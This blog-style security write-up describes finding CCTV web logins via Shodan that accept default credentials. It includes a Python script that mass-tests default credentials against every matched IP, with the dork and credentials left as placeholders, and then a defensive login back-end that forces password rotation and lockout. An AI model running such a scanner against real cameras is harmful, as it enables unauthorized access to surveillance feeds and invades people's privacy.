CCTV cameras default credentials

I’m gonna start this write-up as a story.

It was about 9:00 pm. I was a little tired of bug bounty programs, and normally when I’m tired of bug bounty programs I spend my time reading about new methods or doing some research.

While doing some research with Shodan and Censys on compromised servers being used to mine Monero (Coinhive and similar technologies), I found a CCTV (closed-circuit television) login page mining Monero.

And I was thinking: if this CCTV login page was compromised, maybe the attacker had managed to compromise all the other CCTVs using this technology. Since I don’t want to publicly shame bad security, let’s call this product “Shitty CCTV”.

So by looking at the response headers and source code, I created a dork for Shodan (not disclosing the dork, since I don’t want to be blamed for this being exploited). From this dork I got approximately 5000 web applications; most of them have more than one camera, since this product is mainly used by companies (hotels, plants, schools, etc.).

By checking their login pages I noticed only a few were mining Monero. Now, how did the attacker get access to this application?

The first thing that came to my mind, and probably the method the attacker used to gain access to the CCTV web application, was searching Google for default credentials.

Example: Shitty CCTV default credentials.

And guess what: it worked. So basically it is possible to access all the cameras with default credentials.

But let’s take this default credentials method a step further and ignore the fact that it can be used to mine Monero. If I can get a list of IPs using this technology, I can automate the process of checking whether the default credentials work on every IP. And if they do, this technology is compromising workplace privacy.

Using Python with the shodan library resulted in the following script:

import shodan
import sys
import requests

API_KEY = "APIKEY"  # placeholder: your Shodan API key

try:
    api = shodan.Shodan(API_KEY)
    # placeholder search query; the real dork is intentionally not disclosed
    result = api.search('html: login.dork')

    for service in result['matches']:
        ip = service['ip_str']
        try:
            # placeholder credentials; the vendor's real defaults are not disclosed
            cctv = requests.post('http://' + ip + '/login',
                                 json={'username': 'default', 'password': 'credentials'},
                                 timeout=5)
            if cctv.status_code == 200:
                print('Vulnerable', ip, cctv.status_code)
            elif cctv.status_code == 403:
                print('Not vulnerable', ip, cctv.status_code)
            # any other status code: nothing to report for this host
        except requests.RequestException:
            # unreachable host or network error: move on to the next one
            continue
except Exception as e:
    print('Error: %s' % e)
    sys.exit(1)

Lesson learned: if you have any CCTV or IoT device, remove the default-credentials account, or your device could be compromised. Stay safe.
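The lesson above is the whole fix, so here is what it looks like from the device side. This is an added example, not the post’s script and not any vendor’s firmware: a small Python login back-end that ships with a default account flagged must_change, refuses to accept another factory default (or a short or reused password) as the new one, and locks the account after repeated failures. The credential pairs, the password policy, the lockout threshold and the device itself are constructed assumptions for the example.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict, List

# Factory-default credential pairs for a hypothetical device family.
# Constructed for this example; they stand in for whatever a real vendor ships.
FACTORY_DEFAULTS = {("admin", "admin"), ("admin", "12345"), ("root", "root")}
MIN_PASSWORD_LEN = 12   # assumed policy
MAX_FAILED_LOGINS = 5   # assumed lockout threshold


@dataclass
class Account:
    username: str
    salt: bytes
    pw_hash: bytes
    must_change: bool   # True while the account still carries its factory password
    failed: int = 0     # consecutive failed logins, reset on success


def _hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the device never stores the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def is_factory_default(username: str, password: str) -> bool:
    """True if the pair is one of the known shipped defaults."""
    return (username, password) in FACTORY_DEFAULTS


class CredentialStore:
    """Minimal model of the login back-end behind a CCTV web interface."""

    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}

    def provision_factory_default(self, username: str, password: str) -> None:
        """First-boot state: the default account exists but is flagged must_change."""
        salt = os.urandom(16)
        self.accounts[username] = Account(username, salt, _hash(password, salt), must_change=True)

    def authenticate(self, username: str, password: str) -> str:
        """Returns 'ok', 'must_change', 'locked' or 'denied'.

        'must_change' means the password was correct but is still the factory one; the
        caller should then allow only the password-change page, nothing else.
        """
        acct = self.accounts.get(username)
        if acct is None:
            return "denied"
        if acct.failed >= MAX_FAILED_LOGINS:
            return "locked"
        if not hmac.compare_digest(_hash(password, acct.salt), acct.pw_hash):
            acct.failed += 1
            return "locked" if acct.failed >= MAX_FAILED_LOGINS else "denied"
        acct.failed = 0
        return "must_change" if acct.must_change else "ok"

    def change_password(self, username: str, old: str, new: str) -> bool:
        """Rotate the password; refuses factory defaults, short passwords and reuse."""
        acct = self.accounts.get(username)
        if acct is None or not hmac.compare_digest(_hash(old, acct.salt), acct.pw_hash):
            return False
        if is_factory_default(username, new) or len(new) < MIN_PASSWORD_LEN or new == old:
            return False
        acct.salt = os.urandom(16)
        acct.pw_hash = _hash(new, acct.salt)
        acct.must_change = False
        acct.failed = 0
        return True


def demo() -> List:
    """Walk through first boot -> forced rotation -> lockout; returns the outcomes in order."""
    store = CredentialStore()
    store.provision_factory_default("admin", "admin")
    strong = "Hx7!pLq2#wVn9r"  # constructed example password
    outcomes = [
        store.authenticate("admin", "admin"),              # correct, but still factory: must_change
        store.change_password("admin", "admin", "12345"),  # rejected: another factory default
        store.change_password("admin", "admin", strong),   # accepted
        store.authenticate("admin", "admin"),              # old default no longer works
        store.authenticate("admin", strong),               # normal login
    ]
    for _ in range(MAX_FAILED_LOGINS):
        store.authenticate("admin", "wrong-guess")
    outcomes.append(store.authenticate("admin", strong))   # locked even with the right password
    return outcomes


if __name__ == "__main__":
    print(demo())
```

Two design points worth noting: the must_change flag means a device that is reachable with its factory password is useless to anyone except for rotating that password, and the lockout counter means a scripted check like the one above cannot keep guessing once the account is locked. How the HTTP layer maps these results to status codes is left out; returning the same response for every failure avoids giving probes a convenient oracle.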
